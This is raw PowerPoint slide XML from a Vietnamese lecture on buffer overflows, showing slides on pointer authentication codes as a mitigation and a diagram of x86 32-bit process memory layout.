              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DB1967A-F21B-0F9F-A722-977D8E2E1D71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8591550" y="4189532"/>
            <a:ext cx="552450" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1"/>
              <a:t>SFP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235500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5E2F-1C36-9B44-B670-A282E3F5EC54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer Overflow – Phòng chống</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F68589-3497-F937-4E37-094923EFD24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Mã xác thực con trỏ(PAC - Pointer Authentication Code)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Bộ xử lý 64-bit: sử dụng con trỏ có kích thước 64 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Định địa chỉ được cho 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" baseline="30000"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t> ô nhớ ~ 18 tỉ GB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Các hệ thống máy tính hiện đại: chỉ cần tối đa 42 bit để định địa chỉ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Số bit không được sử dụng: 22 bit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>PAC được gán cho 22 bit không được sử dụng:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Sử dụng các thuật toán để sinh PAC từ giá trị bí mật do CPU sinh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Các chương trình không thể truy cập giá trị bí mật này</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN"/>
              <a:t>Đã được triển khai trên kiến trúc ARM v8.3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3410A5-E6A2-4C6E-C22A-8B68526E75D5}"/>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64977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75C2-53BB-44B7-B1EF-91A733CBF984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bộ nhớ của tiến trình(x86 32-bit)</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6FC0F2-2F63-4870-9130-1AFF0E456B17}"/>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54" name="Rectangle 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BFF7CA-5BAD-A0BF-231C-62DD7E323672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="1143000"/>
            <a:ext cx="2286000" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="26425" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="79463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sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83B8C346-873B-8166-9569-A92192C79570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172075" y="914400"/>
            <a:ext cx="2514600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xffffffff</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E716C0A3-3FAC-B15C-5FBD-C4D6CCBC8B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172075" y="5758190"/>
            <a:ext cx="2514600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2F18B5-F16B-5B6C-567B-708B9CCFA51A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="5529590"/>
            <a:ext cx="2209800" cy="45720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Unused</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 name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8873974-4FE3-4CE6-F3B7-F85AC3147C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="5344180"/>
            <a:ext cx="2514600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x08048000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Rectangle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4D26582-0AF0-36B0-E517-9A0C1E6DC1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="1176010"/>
            <a:ext cx="2209800" cy="33781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Kernel</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 name="TextBox 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614B2869-3B8F-099D-E0E6-5C410D786F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1252210"/>
            <a:ext cx="2514600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45AD0204-6342-84E1-EA31-4615F6009A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="5012695"/>
            <a:ext cx="2209800" cy="45720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Text</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 name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62EE801-5643-5443-43D5-D3599F916C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="4495800"/>
            <a:ext cx="2209800" cy="45720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Data</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 name="Rectangle 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F8F432C-B894-6A5B-C0FD-F57CC7B4133D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="3995410"/>
            <a:ext cx="2209800" cy="45720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BSS</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Rectangle 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA9CD08-91C3-63B6-42D2-FDE1061A94F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2740025" y="3309610"/>
            <a:ext cx="2209800" cy="60960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Heap</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 name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5890D821-7533-B47B-6F08-90C99B81D43A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752725" y="2133598"/>
            <a:ext cx="2209800" cy="414012"/>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Stack</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 name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87CDF654-A1F9-9025-9A1D-FDB3DA9E13D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361950" y="4410298"/>
            <a:ext cx="1924836"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rPr>
              <a:t>Xác định ở thời điểm biên dịch</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Left Brace 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99FD21E6-84AC-76D6-5DB2-875B6032EC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2257426" y="3995410"/>
            <a:ext cx="225082" cy="1534180"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="952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4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sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Left Brace 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E62694-BDF1-5CE6-54F9-1DC184C58FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199489" y="2171840"/>
            <a:ext cx="272292" cy="1747370"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="952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4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sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB31E112-95CA-B427-0503-9ADA3B9C37CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="446889" y="2780370"/>
            <a:ext cx="1924836"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rPr>
              <a:t>Thay đổi khi thực thi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12916BAB-AEB5-DA7C-D483-F1928155B637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361165" y="1488013"/>
            <a:ext cx="222817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rPr>
              <a:t>Thiết lập khi tiến trình bắt đầu</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Left Brace 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010C119D-AF2D-391E-BFBC-9DCB3F901923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2214562" y="1625842"/>
            <a:ext cx="260008" cy="388367"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="952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4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sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Arrow: Down 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BABE2933-8A09-5CCD-2011-6B4020573FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476625" y="2438400"/>
            <a:ext cx="838200" cy="414010"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D2533C">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73" name="Arrow: Down 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8845DC-E214-7161-7667-9E899B3D02ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3476625" y="2950205"/>
            <a:ext cx="838200" cy="414010"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D2533C">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74" name="TextBox 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16BE2FD-AD8B-B264-69AC-D9F0CE717FA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159961" y="5374213"/>
            <a:ext cx="2228172"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rPr>
              <a:t>Không gian địa chỉ của thiết bị vào-ra</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Left Brace 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29303DE8-7ACE-760C-A9B2-B30311A9A85A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241957" y="5615857"/>
            <a:ext cx="213441" cy="403943"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="2929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400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="292934"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Rectangle 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F2E9E06-9E01-2B00-B44D-0F80947FF356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769040" y="1625843"/>
            <a:ext cx="2209800" cy="409960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:lumMod val="75000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="264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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>cmdline &amp; env</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="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7" name="TextBox 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B03BA2-CECB-0253-D6B8-66EB4D10E7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5026025" y="3233410"/>
            <a:ext cx="3800475" cy="9233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a:rPr>
              <a:t>Đ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>ư</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ợc quản lý trong tiến trình bởi các hàm cấp phát bộ nhớ động (malloc, calloc)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="vi-VN" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="TextBox 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
